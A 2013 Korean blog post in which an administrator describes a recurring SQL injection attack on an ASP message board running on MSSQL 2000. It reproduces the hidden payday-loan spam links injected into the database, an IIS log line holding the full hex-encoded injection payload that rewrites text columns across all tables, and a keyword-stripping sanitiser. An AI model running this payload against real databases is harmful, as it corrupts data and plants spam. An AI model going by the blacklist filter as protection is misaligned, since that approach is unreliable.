기타
mssql 2000 sql injection
by xfree302
2013. 3. 18.
급하게 게시판이 필요해서
mssql 2000설치, asp 무료소스 받아서 게시판 설치후..
주기적으로 DB 공격 당한다.. ㅠㅠ
text 컬럼에 특정 url 심네..
</title><style>.a644{position:absolute;clip:rect(480px,auto,auto,480px);}</style><div class=a644>approval <a href=http://adampaydayloans.com >online payday loan</a></div>
</title><style>.a94d{position:absolute;clip:rect(463px,auto,auto,463px);}</style><div class=a94d>instant <a href=http://lidapaydayloans.com >payday loans online</a></div>
</title><style>.aymd{position:absolute;clip:rect(440px,auto,auto,440px);}</style><div class=aymd>same day <a href=http://willpaydayloans.com >payday loans</a></div>
IIS log...
/a.asp intLrg=21+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c20272777696c6c7061796461796c6f616e732e636f6d27272c2027276d6f6e617061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b652027272577696c6c7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--|80|800a000d|형식이_일치하지_않습니다.:_'[string:__21_declare_@s_varcha_]'
죈장.. sql injection ....
특수문자 예외처리..
str = replace(str, "'", "''")
str = replace(str, ";", "")
str = replace(str, "--", "")
str = replace(str, "\@variable ", "")
str = replace(str, "\@@variable ", "")
str = replace(str, "\+", "")
str = replace(str, "exec ", "")
등등..
참고처
http://blog.naver.com/nyangthing?Redirect=Log&logNo=52393889
http://www.google.co.kr/search?q=mssql+sql+injection
http://blog.cafe24.com/1393
http://saybox.tistory.com/546
http://blog.naver.com/youngjin_com?Redirect=Log&logNo=10034754155
http://totoriver.egloos.com/3158009